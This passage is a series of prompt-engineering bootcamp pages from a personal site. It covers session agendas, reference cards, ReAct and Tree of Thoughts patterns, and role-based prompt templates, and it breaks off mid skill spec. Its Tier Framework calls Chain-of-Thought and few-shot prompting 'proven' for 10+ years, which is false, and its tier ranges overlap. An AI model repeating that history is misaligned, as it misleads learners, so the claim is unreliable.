**OBSERVE**: What gaps/strengths emerge from this analysis?
**THINK**: How can I position gaps as learning opportunities?
**ACT**: Develop core narrative connecting past experience → role requirements
## Phase 2: Tree of Thoughts Strategy
**Option A**: [First positioning approach]
- Pros: [What works well]
- Cons: [Potential weaknesses]
- Risk Level: [High/Medium/Low]
**Option B**: [Second positioning approach]
- Pros: [What works well]
- Cons: [Potential weaknesses]
- Risk Level: [High/Medium/Low]
**Option C**: [Third positioning approach]
- Pros: [What works well]
- Cons: [Potential weaknesses]
- Risk Level: [High/Medium/Low]
**Selected Strategy**: [Chosen approach with rationale]
## Phase 3: Materials Generation
- One-page positioning summary
- 5 prepared STAR examples
- Strategic questions to ask
- Practice plan for delivery
```
Research
## Research References
- **White et al. (2023) **— "A Prompt Pattern Catalog to Enhance Prompt Engineering with ChatGPT" · arXiv 2302.11382
Foundational patterns: Persona, Few-shot, Template, Chain-of-Thought
- **Yao et al. (2022) **— "ReAct: Synergizing Reasoning and Acting in Language Models" · arXiv 2210.03629
Think → Act → Observe pattern for complex reasoning
- **Yao et al. (2023) **— "Tree of Thoughts: Deliberate Problem Solving with Large Language Models" · arXiv 2305.10601
Generate → Evaluate → Choose pattern for decision making Completion
## Workshop Completion Checklist
### Session 1 Objectives
- I can explain when to use ADRs vs Structured Files vs Tool-Assisted approaches
- I can identify Persona, Few-shot, Template, Chain-of-Thought patterns in prompts
- I generated realistic priorities using the Priority Builder methodology
- I understand the difference between systematic and ad-hoc prompting
### Session 2 Objectives
- I can execute ReAct analysis (Think → Act → Observe) for complex problems
- I can use Tree of Thoughts to evaluate multiple strategies
- I built complete interview preparation materials using the 4-file workflow
- I see how the same patterns scale across business and technical domains
### Action Items
- Apply ReAct pattern to one complex work decision this week
- Create a spec-kit workflow for a task I do repeatedly
- Evaluate new AI tools using the Tier Framework
- Share the Three Approaches framework with my team Joey Lopez · 2026 · [jrlopez.dev ]()
[← home ]()· [bootcamp overview ]()· [session 1 → ]()· [session 2 → ]()· [quick reference → ]()· [facilitator guide → ]()[.md ]()
---
# bootcamp-reference.md
# https://jrlopez.dev/p/bootcamp-reference.html
---
title: "Quick Reference Cards"
description: "6-card one-pager of all frameworks."
author: "Joey Lopez"
date: "2026-01-20"
tags: ["reference", "prompting", "template"]
atom_id: 11
source_html: "bootcamp-reference.html"
url: "https://jrlopez.dev/p/bootcamp-reference.html"
generated: true
---
[← home ]()[bootcamp ]()[decision matrix ]()[foundational patterns ]()[advanced patterns ]()[taking it forward ]()
# Quick Reference One-page reference for all frameworks, patterns, and workflows from the Prompt Engineering Bootcamp Joey Lopez · Prompt Engineering Bootcamp [decision matrix ]()[foundational patterns ]()[advanced patterns ]()[action plan ]()Card 1
## Three Approaches Decision Matrix
| When your task is... || Choose this approach || Example |
| Simple–Medium complexity || **ADRs + Config ** || .github/copilot-instructions.md |
| Team uses multiple AI tools || **ADRs + Config ** || Reference standards document |
| Complex, repeated tasks || **Structured Files ** || Priority Builder (325 lines) |
| Learning prompt engineering || **Structured Files ** || 4-file interview workflow |
| Team committed to one IDE || **Tool-Assisted ** || Windsurf workflows |
| Want automated guidance || **Tool-Assisted ** || Platform-integrated prompts |
Decision Rule Use the simplest approach that handles your complexity level. Card 2
## Foundational Patterns Checklist Before writing any prompt, check for all four patterns:
- **Persona **— "You are an expert [role] with [specific expertise]..."
- **Few-shot **— Provide 2–3 example input/output pairs
- **Template **— "Respond in this format: [structure]"
- **Chain-of-Thought **— "Show your reasoning step by step" **Quality check: **Does your prompt use all 4 patterns? If not, which one would help most? Card 3
## Advanced Patterns Quick Guide
### ReAct Pattern — multi-step tasks
```
THINK: Analyze the situation — what is actually needed?
ACT: Take a specific, concrete action
OBSERVE: Check results — did it work? What changed?
THINK: Next steps based on what you observed
(repeat until complete)
```
### Tree of Thoughts — decision points
```
1. Generate 3 genuinely different approaches
2. Evaluate pros/cons/risks of each
3. Choose best approach with explicit rationale
```
### Spec-Kit Workflow — complex tasks
```
knowledge-base.md Domain expertise (reusable across tasks)
specification.md This task's specific requirements
implementation-plan.md Execution strategy (ReAct + Tree of Thoughts)
execution.md Generated output materials
```
Card 4
## Pattern Recognition Quick Test When you see any prompt, identify:
- What **persona **is established?
- What **examples **are provided?
- What **format **is requested?
- Is **reasoning **required?
#### Good prompt = all 4 patterns visible If you can't find one of the four, the prompt has a gap. Fill it before you run it. Card 5
## Taking This Forward
### This Week
- Apply ReAct pattern to one complex work decision
- Use Tree of Thoughts for your next strategic choice
- Create a spec-kit workflow for a task you do repeatedly
### Longer Term
- Evaluate new AI tools using the Three Approaches framework
- Build team templates using foundational patterns
- Scale systematic thinking across your domain The Core Principle Patterns beat formats. Choose your approach based on team context and task complexity. Card 6
## Research Backing
- **White et al. (2023) **— Prompt Pattern Catalog · arXiv 2302.11382
Foundational patterns: Persona, Few-shot, Template, Chain-of-Thought
- **Yao et al. (2022) **— ReAct Pattern · arXiv 2210.03629
Think → Act → Observe for complex reasoning
- **Yao et al. (2023) **— Tree of Thoughts · arXiv 2305.10601
Generate → Evaluate → Choose for decision making Joey Lopez · 2026 · [jrlopez.dev ]()
[← home ]()· [bootcamp overview ]()· [session 1 ]()· [session 2 ]()· [participant materials ]()· [facilitator guide ]()[.md ]()
---
# bootcamp-session1.md
# https://jrlopez.dev/p/bootcamp-session1.html
---
title: "Session 1 — Patterns"
description: "Three Approaches, foundational patterns, priority builder."
author: "Joey Lopez"
date: "2026-01-15"
tags: ["prompting", "teaching"]
atom_id: 9
source_html: "bootcamp-session1.html"
url: "https://jrlopez.dev/p/bootcamp-session1.html"
generated: true
---
[← home ]()[bootcamp ]()[the problem ]()[three approaches ]()[patterns ]()[exercises ]()[wrap-up ]()
# Session 1 Industry Standards & Real-World Application — from ad-hoc prompting to systematic approaches Joey Lopez · Prompt Engineering Bootcamp · 60 minutes [the problem ]()[three approaches ]()[patterns ]()[exercises ]()Overview
## Session Agenda
| Time || Activity || Type |
| 0–5 min || Problem & Solution Overview || Lecture |
| 5–15 min || Three Approaches Framework || Lecture |
| 15–20 min || Foundational Patterns || Lecture |
| 20–25 min || Demo: Priority Builder || Hands-on |
| 25–45 min || Your Turn: Build Priorities || Hands-on |
| 45–55 min || Compare: Three Approaches || Hands-on |
| 55–60 min || Wrap & Session 2 Preview || Lecture |
The Problem
## Ad-Hoc AI Prompting Doesn't Scale Most professionals use AI tools the same way they'd use a search engine — one-off questions, generic context, inconsistent results. Here's what that looks like:
```
Professional: "Hey AI, help me write my annual priorities"
AI: [generates generic priorities]
Professional: "These don't capture my impact... try again"
AI: [generates different generic priorities]
Professional: "Still missing key metrics..."
```
The problems with ad-hoc prompting:
- Every prompt starts from scratch — no accumulated knowledge
- No team knowledge captured — can't share what works
- Inconsistent results across attempts and team members
- Successful approaches can't be reused or improved **Key insight: **Patterns matter more than format. Choose based on team needs, not dogma. Framework
## Three Valid Approaches There is no single "right" way to do systematic prompting. Three approaches have emerged in industry practice, each suited to different team contexts:
#### ADRs + Config Architecture Decision Records plus configuration files. Example: .github/copilot-instructions.mdthat any AI tool reads automatically. Best for most teams. Low setup overhead.
#### Structured Files Multi-file workflows: knowledge-base → specification → implementation-plan. Each file has a specific purpose and builds on the previous. Best for complex, repeated tasks and learning.
#### Tool-Assisted Platform-native workflows like Windsurf's cascade system (290 lines). The tool manages context and sequencing automatically. Best for teams committed to one IDE or platform.
### Tier Framework for Evaluation Use this to assess any prompt engineering approach you encounter:
#### Tier 1 — Proven (10+ years) Architecture Decision Records, Few-shot prompting, Chain-of-Thought. Used at scale by Microsoft, AWS, Google, Netflix. These patterns have survived real production use.
#### Tier 2 — Production Ready (1–3 years) .github/copilot-instructions.md, ReAct pattern. Growing enterprise adoption. Reasonably safe to build on.
#### Tier 3 — Experimental (<2 years) Spec-kit workflows, structured prompt files, tool-specific approaches. Interesting and useful, but unproven at scale. Use deliberately. Patterns
## Four Foundational Patterns These patterns are research-backed and appear in all serious prompt engineering work. A well-constructed prompt uses all four. Persona "You are an expert [role] with [specific expertise]..." Establishes the lens the AI uses for all responses. Few-shot Provide 2–3 example input/output pairs before your actual request. Shows the desired format and quality level. Template "Respond in this format: [structure]" Constrains output shape for reuse and consistency. Chain-of-Thought "Show your reasoning step by step before giving the answer." Forces deliberate reasoning, catches errors earlier.
### The 325-Line Priority Builder The Priority Builder Agent prompt uses all four patterns together. It demonstrates what a production-grade prompt looks like vs a quick one-off request:
- **Persona: **"You are an expert career coach specializing in professional priorities..."
- **Few-shot: **Built-in priority examples with ABCD reflections showing expected quality
- **Template: **Structured CSV output plus formatted summaries for direct submission
- **Chain-of-Thought: **The 20-question ABCD reflection framework that guides analysis The result: persona-driven specificity, structured questioning that ensures completeness, and consistent output format — versus the ad-hoc alternative that generates something generic every time. Exercises
## Hands-On: Build Priorities
### Exercise 1 — Freestyle First (10 minutes) Before using any systematic approach, attempt to create one priority for a demo persona using your normal prompting style.
#### Choose a demo persona
- **Option A: **Delivery Lead, Financial Services (8 years, team management)
- **Option B: **Tech Lead, Banking Automation (5 years, AI/ML specialist)
- **Option C: **Associate Manager, Digital Strategy (6 years, transformation) **Goal: **1 priority in any category with basic reflection. Use your AI tool however you normally would. Notice what's hard: specificity, metrics, avoiding generic language that could apply to anyone.
### Exercise 2 — Priority Builder Template (15 minutes) Now use the complete Priority Builder Agent with a different persona than Exercise 1.
- Load the 325-line Priority Builder prompt into your AI tool
- Choose a different persona than the freestyle round
- Let the agent guide you through its 20-question process — answer as your persona
- Select a version: Conservative, Balanced, or Aspirational
- Export the CSV output (ready for submission format) **Success criteria: **Complete ABCD reflections with specific metrics, CSV output ready.
### Exercise 3 — Compare Three Approaches (10 minutes) Same Spring Boot 2→3 migration task, three different approaches. Observe the difference in structure and maintenance overhead — not the result.
#### Approach A — ADRs + Config
```
"Following .github/copilot-instructions.md,
migrate UserController to Spring Boot 3"
```
#### Approach B — Structured Files Load: knowledge-base.md→ specification.md→ implementation-plan.md
#### Approach C — Tool-Assisted Windsurf cascade workflow (290-line systematic methodology with built-in validation steps). Same result, different maintenance overhead. Which fits your team? Wrap-Up
## What You Accomplished
- Learned the Three Approaches evaluation framework and when each applies
- Recognized all four foundational patterns in a real 325-line production prompt
- Generated priorities using a systematic approach vs freestyle
- Compared structured vs unstructured methodology on the same task
### Cross-Domain Application The patterns you practiced in this session work across domains:
#### Business Applications
- Strategic planning documents
- Performance reviews and goal setting
- Client presentations and proposals
- Training material development
#### Technical Applications
- Code migration and refactoring
- Architecture documentation
- Troubleshooting workflows
- System design patterns Same systematic thinking, different domain. Session 2 demonstrates this across the full range.
#### Session 2 Preview
- **ReAct pattern **(Think → Act → Observe) for multi-step reasoning
- **Tree of Thoughts **for decision points with real tradeoffs
- **Interview prep workflow **— 4-file systematic approach
- **Live technical demo **— Spring Boot migration using same patterns Bring a job description you're interested in, or use the samples in the participant materials. Joey Lopez · 2026 · [jrlopez.dev ]()
[← home ]()· [bootcamp overview ]()· [participant materials ]()· [session 2 → ]()· [quick reference ]()· [facilitator guide ]()[.md ]()
---
# bootcamp-session2.md
# https://jrlopez.dev/p/bootcamp-session2.html
---
title: "Session 2 — Advanced"
description: "ReAct, Tree of Thoughts, spec-kit, interview prep."
author: "Joey Lopez"
date: "2026-01-22"
tags: ["prompting", "teaching"]
atom_id: 10
source_html: "bootcamp-session2.html"
url: "https://jrlopez.dev/p/bootcamp-session2.html"
generated: true
---
[← home ]()[bootcamp ]()[recap ]()[advanced patterns ]()[spec-kit ]()[exercises ]()[java demo ]()[next steps ]()
# Session 2 Advanced Patterns & Complete Workflows — from simple templates to orchestrated systems Joey Lopez · Prompt Engineering Bootcamp · 60 minutes [ReAct ]()[Tree of Thoughts ]()[spec-kit ]()[exercises ]()[java demo ]()Overview
## Session Agenda
| Time || Activity || Type |
| 0–5 min || Session 1 Recap + Advanced Patterns Overview || Lecture |
| 5–10 min || Spec-Kit Methodology || Lecture |
| 10–15 min || ReAct + Tree of Thoughts || Lecture |
| 15–25 min || Demo: Interview Prep Workflow || Hands-on |
| 25–40 min || Your Turn: Build Interview Materials || Hands-on |
| 40–55 min || Live Java Demo: Spring Migration || Hands-on |
| 55–60 min || Integration + Next Steps || Lecture |
Foundation
## Session 1 Recap In Session 1 you built the foundation:
- **Three Approaches Framework **— ADRs vs Structured Files vs Tool-assisted
- **Tier Evaluation **— proven vs emerging vs experimental
- **Four Foundational Patterns **— Persona, Few-shot, Template, Chain-of-Thought
- **Real application **— Priority Builder with actual deliverables and CSV output Session 2 evolves each of those: simple patterns become orchestrated workflows, single-step tasks become multi-phase reasoning, and the same methodology scales from priorities to interviews to code. Patterns
## Advanced Patterns When a single prompt with four foundational patterns isn't enough for complex, multi-step tasks, two research-backed patterns handle the gap:
### ReAct Pattern From Yao et al. (2022). Designed for tasks that require validation checkpoints between steps — where you can't know the next action until you observe the result of the current one. THINK : Analyze the situation — what's actually being asked?
↓
ACT : Take a specific, concrete action
↓
OBSERVE : Check results — did it work? What changed?
↓
THINK : Next steps based on what you observed
↓
Repeat until task complete **When to use: **Multi-step tasks where each step depends on the previous result. Code migration, gap analysis, systematic positioning strategy.
### Tree of Thoughts From Yao et al. (2023). Designed for decision points where multiple valid approaches exist and the right choice requires explicit evaluation of tradeoffs.
```
1. Generate 3 genuinely different approaches to the problem
2. Evaluate pros/cons/risks of each approach explicitly
3. Choose the best approach with clear rationale
4. Proceed with that choice
```
**When to use: **Any decision point with real tradeoffs. Interview positioning strategy, architecture choices, migration approach selection.
### When Simple Patterns Are Enough
#### Use Foundational Patterns (Session 1)
- Single-step tasks
- Well-understood domains
- Template-driven outputs
- Quick iterations needed
#### Use Advanced Patterns (Session 2)
- Multi-step reasoning required
- Decision points with tradeoffs
- Complex domain knowledge
- Audit trail needed
- Team scalability important **Decision rule: **Use the simplest approach that handles the complexity. Don't reach for ReAct when a good Persona + Template covers it. Methodology
## Spec-Kit 4-File Workflow The spec-kit pattern separates concerns across files so each piece can be reused, updated independently, and understood by teammates without context from your head. File 1 knowledge-base.md Domain expertise. Reusable across tasks. STAR method, positioning options, evaluation criteria. File 2 specification.md This task's specific requirements. Role details, candidate background, gaps and strengths. File 3 implementation-plan.md Execution strategy using ReAct + Tree of Thoughts. Reasoning documented. File 4 execution.md Generated materials — positioning statement, STAR examples, talking points. **Key advantage: **Separation of concerns. knowledge-base.md stays reusable; specification.md is the only file that changes per task; execution.md is throwaway. Exercises
## Exercise: Build Interview Strategy
### Phase 1 — Create specification.md (8 minutes)
- Start with the provided knowledge-base.md(interview fundamentals, STAR method, positioning options)
- Select a job from the participant materials (Senior Manager AI Strategy, Principal Consultant Banking, Director Digital Transformation)
- Pick the same demo persona you used in Session 1 for continuity
- Document: target role details, your persona's background, key gaps and key strengths
### Phase 2 — Execute implementation-plan.md (7 minutes)
#### ReAct Analysis
```
THINK: What is the biggest gap between my background and this role?
ACT: Map my specific experience to each key requirement
OBSERVE: What positioning angle emerges from this mapping?
THINK: How do I turn gaps into learning narratives?
ACT: Develop core connecting story: past experience → role requirements
```
#### Tree of Thoughts Strategy
```
Option A: Technical Expert
Pros: Deep credibility, clear differentiation
Cons: May undersell business acumen, narrow appeal
Risk: Medium
Option B: Strategic Leader
Pros: Broad appeal, executive positioning
Cons: May lack specificity, needs strong evidence
Risk: Medium
Option C: Balanced Bridge
Pros: Technical depth + business growth story
Cons: Harder to articulate concisely
Risk: Low
Selected: [Your choice with rationale]
```
**Success criteria: **Clear positioning strategy with documented rationale, not just a chosen answer. Technical Demo
## Live Java Demo: Spring Boot Migration Same patterns, technical domain. Spring Boot 2→3 migration involves three types of changes: namespace updates ( javax→ jakarta), annotation modernization, and security configuration updates. The three approaches from Session 1 apply directly:
#### Approach A — ADRs + Config A .github/copilot-instructions.mdthat documents migration standards. Single prompt referencing that document handles most cases.
```
"Following .github/copilot-instructions.md migration standards,
migrate UserController to Spring Boot 3"
```
#### Approach B — Structured Files (with ReAct) A spec/ folder workflow. ReAct pattern in the implementation plan:
```
THINK: Dependencies must be updated before annotations
ACT: Update javax → jakarta imports first
OBSERVE: mvn compile — success, proceed to annotations
THINK: Security config needs modernization next
ACT: Migrate to SecurityFilterChain pattern
```
#### Approach C — Tool-Assisted (Windsurf) 290-line cascade workflow. Built-in validation gates at each step. Tree of Thoughts for security config decision:
- Option A: Keep current security config (low risk, technical debt remains)
- Option B: Modernize to SecurityFilterChain (balanced)
- Option C: Full OAuth2 rewrite (high risk, high reward)
- **Decision: **Option B — balanced modernization
### Cross-Domain Pattern Recognition The same cognitive patterns appear across all three domains in this workshop:
#### Universal pattern: ReAct
- **Priorities: **Think what category fits → Act on metrics → Observe quality → Refine
- **Interview: **Think about gap → Act on positioning → Observe fit → Select strategy
- **Code: **Think dependencies → Act on imports → Observe compilation → Continue The domain changes. The systematic thinking doesn't. Toolkit
## What You Now Have
#### Evaluation Framework
- Three Approaches — ADRs vs Structured vs Tool-assisted
- Tier Assessment — proven vs emerging vs experimental
#### Pattern Library
- **Foundational: **Persona, Few-shot, Template, Chain-of-Thought
- **Advanced: **ReAct, Tree of Thoughts, Spec-Kit
### This Week
- Apply ReAct pattern to one complex work decision
- Use Tree of Thoughts for your next strategic choice — write out the three options explicitly
- Create a spec-kit workflow for one task you do repeatedly
### Longer Term
- Evaluate new AI tools using the Three Approaches and Tier frameworks before adopting
- Build team templates using proven foundational patterns — document what works
- Apply systematic thinking across your domain — same patterns, different problems
#### Research Papers
- White et al. (2023) — Prompt Pattern Catalog · arXiv 2302.11382
- Yao et al. (2022) — ReAct Pattern · arXiv 2210.03629
- Yao et al. (2023) — Tree of Thoughts · arXiv 2305.10601 Joey Lopez · 2026 · [jrlopez.dev ]()
[← home ]()· [bootcamp overview ]()· [← session 1 ]()· [participant materials ]()· [quick reference ]()· [facilitator guide ]()[.md ]()
---
# bootcamp-skills.md
# https://jrlopez.dev/p/bootcamp-skills.html
---
title: "Make Skills (Capstone)"
description: "Build your own skill from any repeated task."
author: "Joey Lopez"
date: "2026-03-20"
tags: ["methodology", "teaching", "template"]
atom_id: 21
source_html: "bootcamp-skills.html"
url: "https://jrlopez.dev/p/bootcamp-skills.html"
generated: true
---
[← home ]()[bootcamp ]()[developer ]()[PO/PM ]()[delivery ]()[tech lead ]()[make skills ]()
# Bootcamp Skills Reference Five role-specific AI workflow guides. Pick your track, run the interrogation, get structured output. Joey Lopez · Sr. Data Engineer [developer ]()[PO/PM ]()[delivery lead ]()[tech lead ]()[make skills ]()Developer PO / PM Delivery Lead Tech Lead Make Skills skill spec ---
name : dev-second-brain
version : 1.0
description : Interrogation-driven code assistance — migrations, refactoring, features, debugging
patterns : [ReAct, spec-kit, structured-output]
---
## Developer Second Brain Gathers rich context about your codebase before suggesting changes. Uses ReAct (THINK→ACT→OBSERVE) to produce plans, diffs, and tests — not loose prose. Context is everything Structure gets rewarded You are the retrieval system ⇩ Download SKILL.md When to use each scenario
#### A — Code Migration "I need to migrate from Framework A to B" Migration plan, code diffs, test strategy, rollback plan.
#### B — Refactoring "I need to refactor this component" Refactoring goals, dependency map, extraction plan, test approach.
#### C — Feature Implementation "Build a new feature following our patterns" Feature spec, code stubs with TODOs, test outline, integration points.
#### D — Systematic Debugging "Track down root cause of production issue" Hypothesis, investigation steps, diagnostic queries, solution options. Interrogation Framework 15 questions · 4 phases ▶
#### Phase 1 — Current State (Q1–5)
- **Language & Framework **What language/framework + version? (e.g., Python 3.11 + Django 4.2)
- **Architecture Pattern **Monolith, microservices, event-driven, layered?
- **Current Problem **What specifically needs to change? (one sentence)
- **Scope **One file, one module, or multiple services?
- **Team Size **How many developers? What is your role?
#### Phase 2 — Target State (Q6–8)
- **Success Criteria **How will you know it is working? Metrics, tests, deployment success?
- **Constraints **No downtime, budget limits, timeline?
- **Dependencies **What other systems does this touch?
#### Phase 3 — Implementation Context (Q9–12)
- **Test Coverage **Existing tests? Unit, integration, e2e?
- **Team Conventions **Naming convention, error handling pattern, logging standard?
- **Review Process **Automated checks, approval gates?
- **Rollback Plan **Safety net if something goes wrong?
#### Phase 4 — Knowledge (Q13–15)
- **Similar Changes **Have you done something like this before?
- **Tribal Knowledge **What does every developer wish they knew about this codebase?
- **Decision Log **Are there decisions that limit how you can change this? Starter Prompt Templates copy and paste ▶ Prompt Template — Scenario A (Migration) Copy
```
You are a Developer Second Brain using the ReAct pattern (THINK→ACT→OBSERVE).
I need to migrate [OLD FRAMEWORK/VERSION] to [NEW FRAMEWORK/VERSION].
Before generating any plan, ask me the following questions one phase at a time:
Phase 1: Language/framework, architecture, scope, team size, current pain point
Phase 2: Success criteria, constraints, dependencies
Phase 3: Test coverage, team conventions, rollback plan
Phase 4: Prior similar changes, tribal knowledge, decision constraints
After I answer all phases, produce:
1. Implementation plan with THINK/ACT/OBSERVE annotations
2. Code diffs (before/after) for the critical path
3. Test strategy matrix (component | test type | approach | coverage)
4. Pre-deployment checklist
```
Prompt Template — Scenario C (Feature Implementation) Copy
```
You are a Developer Second Brain.
I need to implement [FEATURE NAME] following our existing team conventions.
Interrogate me through 4 phases before generating anything:
Phase 1: Language/framework, architecture pattern, current module structure, scope
Phase 2: Success criteria, constraints, dependencies
Phase 3: Test pattern, naming conventions, error handling style, code review process
Phase 4: Tribal knowledge, any architectural constraints
Then produce:
- Code stubs with clear TODO annotations (following our exact conventions)
- Test file skeleton (matching our test pattern)
- Integration checklist
- Pre-merge checklist
```
Prompt Template — Scenario D (Debugging) Copy
```
You are a Developer Second Brain using systematic debugging (ReAct).
I have a production issue: [DESCRIBE SYMPTOM]
Before generating hypotheses, ask me:
1. What is the exact error or unexpected behavior?
2. When did it start? After what change?
3. What have you already tried?
4. What do the logs show?
5. Which components or services are involved?
Then generate:
THINK: Top 3 hypotheses ranked by probability
ACT: Investigation steps for each hypothesis (specific commands/queries)
OBSERVE: What to look for — how to confirm or rule out each hypothesis
```
Output Templates ReAct plan · test matrix · checklist ▶ Implementation Plan (ReAct Format) Copy
```
## Migration Plan: [Component] from [Old] to [New]
### Phase 1: Preparation
**THINK**: What needs to be true before we start?
- [ ] Dependencies installed
- [ ] Tests passing
- [ ] Backup created
**ACT**: Run these commands:
```bash
# setup steps
```
**OBSERVE**: Verify with:
```bash
# verification commands
```
### Phase 2: Core Change
**THINK**: What is changing and why?
- Breaking change X affects Y consumers
- New API requires Z configuration
**ACT**: Apply these changes:
```diff
- old_code()
+ new_code()
```
**OBSERVE**: Test coverage:
- [ ] Unit test for new_code()
- [ ] Integration test for X→Y flow
- [ ] No regression in unchanged code
### Phase 3: Verification
**THINK**: How do we know this is safe?
**ACT**: Run full test suite
**OBSERVE**: Success criteria met
```
Test Strategy Matrix Copy
```
| Component | Test Type | Approach | Coverage |
|--------------|-------------|---------------------------------|---------------------------|
| [Component] | Unit | Mock async response | Function returns correctly |
| [Service] | Integration | Real async client | Full workflow with I/O |
| [API Handler]| E2E | Load test | 100 concurrent requests |
| [Rollback] | Regression | Before/after comparison | No breaking changes |
```
Pre-Deployment Checklist Copy
```
## Pre-Deployment Checklist
### Code Quality
- [ ] Tests pass (unit + integration + e2e)
- [ ] Code review approved
- [ ] No new warnings in linter/type checker
- [ ] No security issues in dependency scan
- [ ] Documentation updated
### Performance & Stability
- [ ] Load test shows no degradation
- [ ] Error handling covers edge cases
- [ ] Logging added for debugging
- [ ] Monitoring/alerting updated
### Rollback Safety
- [ ] Rollback plan documented
- [ ] Migration is reversible (if database changes)
- [ ] Feature flag allows instant disable
- [ ] Previous version can run in parallel if needed
```
ReAct Pattern Reference THINK What is the constraint here? Analyze the problem space, map dependencies, identify what could break. ACT Apply the code change. Show the concrete diff or implementation stub. OBSERVE How do we verify? List the test commands, metrics, and success criteria. When to use this skill vs. your IDE ▶
| Task || Use IDE || Use This Skill |
| Syntax autocomplete || IDE || |
| Quick bug fix || IDE || |
| Migrate framework || || This skill |
| Refactor large component || || This skill |
| New feature matching patterns || || This skill |
| Root cause debugging || || This skill |
| Architecture code review || || This skill |
skill spec ---
name : po-second-brain
version : 1.0
description : Requirements capture, sprint planning, stakeholder communication, roadmap prioritization
patterns : [spec-kit, Given/When/Then, value-effort-risk scoring]
---
## PO / PM Second Brain Gathers context about stakeholders, constraints, and success criteria before generating requirements, sprint backlogs, or roadmaps — never guesses. Context is everything Structure gets rewarded You are the retrieval system ⇩ Download SKILL.md When to use each scenario
#### A — Requirements Capture "We need to document requirements for our new feature" User stories with Given/When/Then, priority ranking, dependency mapping, edge cases.
#### B — Sprint Planning "Help me plan the next 2-week sprint" Sprint backlog with estimates, capacity check, dependency graph, burn-down projections.
#### C — Stakeholder Communication "I need a status report for exec leadership" Executive summary, progress metrics, risks with mitigation, asks with clear impact statements.
#### D — Roadmap Planning "We have 15 features to prioritize for Q2–Q3" Ranked roadmap with rationale, resource allocation, timeline projections, risk adjustments. Interrogation Framework 23 questions · 5 phases ▶
#### Phase 1 — Business Context (Q1–6)
- **Company / Product **What are we building? SaaS, internal tool, mobile app?
- **Business Goal **North star metric — revenue, retention, cost savings, efficiency?
- **Current State **How is this done today? Manual, competitor, legacy?
- **Success Definition **Metrics, adoption, feedback that signals success?
- **Stakeholders **Executive sponsor, users, customers, team leads?
- **Timeline **Hard deadline, flexible, market window?
#### Phase 2 — Scope & Requirements (Q7–12)
- **Scope Statement **What is in scope, what is out? MVP vs. future?
- **Primary Users **Customer, internal, both?
- **Key Workflows **3–4 critical user flows?
- **Constraints **Non-negotiable technology, budget, compliance?
- **Dependencies **Other projects or systems this depends on?
- **Known Unknowns **Risks or uncertainties?
#### Phase 3 — Team & Capacity (Q13–16)
- **Team Size **Developers, designers, QA?
- **Team Experience **Domain familiarity?
- **Existing Patterns **Tech stack, design patterns?
- **Velocity **Story points per sprint?
#### Phase 4 — Acceptance & Validation (Q17–20)
- **Acceptance Criteria Style **Given/When/Then, checklist, other?
- **Definition of Done **Code review, tests, deployment, user validation?
- **Validation Approach **Demo, metrics, user testing?
- **Rollback Plan **Safety net if something does not work?
#### Phase 5 — Knowledge & Decisions (Q21–23)
- **Decision Constraints **Platform choices, compliance that limit options?
- **Tribal Knowledge **What does every PM wish they knew about this project?
- **Competitive Intel **How do competitors handle this? Starter Prompt Templates copy and paste ▶ Prompt Template — Scenario A (Requirements Capture) Copy
```
You are a PO/PM Second Brain using the spec-kit methodology (Knowledge → Specification → Plan → Execution).
I need to capture requirements for [FEATURE/PROJECT NAME].
Interrogate me through 5 phases before generating anything:
Phase 1: Business goal, current state, success definition, stakeholders, timeline
Phase 2: Scope (in/out), primary users, critical workflows, constraints, dependencies
Phase 3: Team size, experience, velocity
Phase 4: Acceptance criteria format, definition of done, validation approach
Phase 5: Decision constraints, tribal knowledge
Then generate:
- 3-5 user stories in Given/When/Then format
- Edge cases for each story
- Dependency map
- Priority ranking with rationale
```
Prompt Template — Scenario D (Roadmap Prioritization) Copy
```
You are a PO/PM Second Brain.
I have [N] features to prioritize for [TIME HORIZON].
Ask me these questions before scoring:
1. What is the primary business goal for this period?
2. What is the team's capacity (story points per sprint, sprints available)?
3. What are the hard constraints (compliance, dependencies, deadlines)?
4. What does "high value" mean for this business? (Revenue, retention, cost savings?)
5. What are the top 3 risks we want to avoid?
Then produce a ranked roadmap using:
Priority Score = (Value × 3 + Revenue Impact) - (Effort × 2 + Risk × 1.5)
Tier 1: Launch now | Tier 2: Plan for next quarter | Tier 3: Defer
Format: table with Rank, Feature, Value, Effort, Risk, Impact, Owner, Status, Rationale
```
Output Templates user story · sprint backlog · stakeholder report ▶ User Story with Acceptance Criteria Copy
```
## User Story: [Feature Title]
**Story ID**: PROJ-123
**Sprint**: Q2 Sprint 2
**Priority**: High
**Estimate**: 8 points
### Description
As a [user type], I want to [action], so that [benefit].
### Acceptance Criteria
Given [context]
When [action]
Then [expected outcome]
Given [context]
When [action]
Then [expected outcome]
### Edge Cases
- What if [edge case A]? → [handling]
- What if [edge case B]? → [handling]
### Dependencies
- Requires [system/story] (tracked in PROJ-XXX)
### Success Criteria
- [ ] [Metric 1]
- [ ] [Metric 2]
```
Stakeholder Status Report Copy
```
## Q[N] Progress Report
**Period**: [Date range]
**Overall Status**: GREEN / YELLOW / RED
## Executive Summary
**The Ask**: [One ask with clear impact and cost]
## Progress Snapshot
### Completed
- [Story/feature] — [outcome metric]
### In Progress
- [Story/feature] — [% complete, on track / at risk]
## Metrics
| Metric | Target | Current | Status |
|-------------------|--------|---------|--------|
| [Metric 1] | [val] | [val] | GREEN |
| [Metric 2] | [val] | [val] | YELLOW |
## Risk Register
| Risk | Impact | Status | Owner | Mitigation |
|----------------|--------|---------|-------|-----------|
| [Risk 1] | High | Active | [name]| [plan] |
## What We Need From You
| Ask | Impact | Timeline |
|-------------------|---------------------------|------------------|
| [Decision needed] | [What slips if delayed] | [Date] |
```
Prioritized Roadmap Copy
```
## Q[N]-Q[N+1] Product Roadmap
### Prioritization Formula
Priority Score = (Value × 3 + Revenue Impact) - (Effort × 2 + Risk × 1.5)
### Tier 1: Launch Now
| Rank | Feature | Value | Effort | Risk | Impact | Owner | Status |
|------|---------|-------|--------|------|--------|-------|--------|
| 1 | [name] | 5 | 3 | 1 | [why] | [who] | [%] |
### Tier 2: Plan Next Quarter
| Rank | Feature | Value | Effort | Risk | Impact | Owner | Status |
|------|---------|-------|--------|------|--------|-------|--------|
| 5 | [name] | 4 | 4 | 2 | [why] | [who] | backlog|
### Tier 3: Defer
| Rank | Feature | Reason for Deferral |
|------|---------|---------------------|
| 9 | [name] | Low demand, high complexity |
```
skill spec ---
name : dl-second-brain
version : 1.0
description : Priority building, team scaling, client status reporting, delivery risk assessment
patterns : [ABCD-priorities, RAG-status, risk-matrix, onboarding-plan]
---
